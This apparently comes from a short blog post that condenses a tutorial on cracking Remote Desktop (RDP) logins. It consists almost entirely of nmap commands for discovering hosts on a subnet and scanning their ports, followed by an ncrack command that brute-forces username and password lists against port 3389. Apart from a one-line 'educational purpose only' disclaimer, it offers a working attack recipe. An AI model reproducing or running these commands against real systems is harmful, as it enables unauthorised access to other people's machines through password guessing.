Found a very well written tutorial on how to crack a RDP host here.

In less lines here is how-to:

Scan
[cc lang=”bash”]nmap -sP 192.168.56.0/24 | grep -Eo ‘([0-9]{1,3}.){3}[0-9]{1,3}’ > 192.168.56.0.txt[/cc]

[cc lang=”bash”]nmap -F -iL 192.168.56.0.txt[/cc]

create a user list and a passwd list (my.usr & my.pwd)

[cc lang=”bash”]ncrack -vv -U my.usr -P my.pwd 192.168.56.10:3389,CL=1[/cc]

thats it.

Do not use this tools on live production systems. Educational purpose only.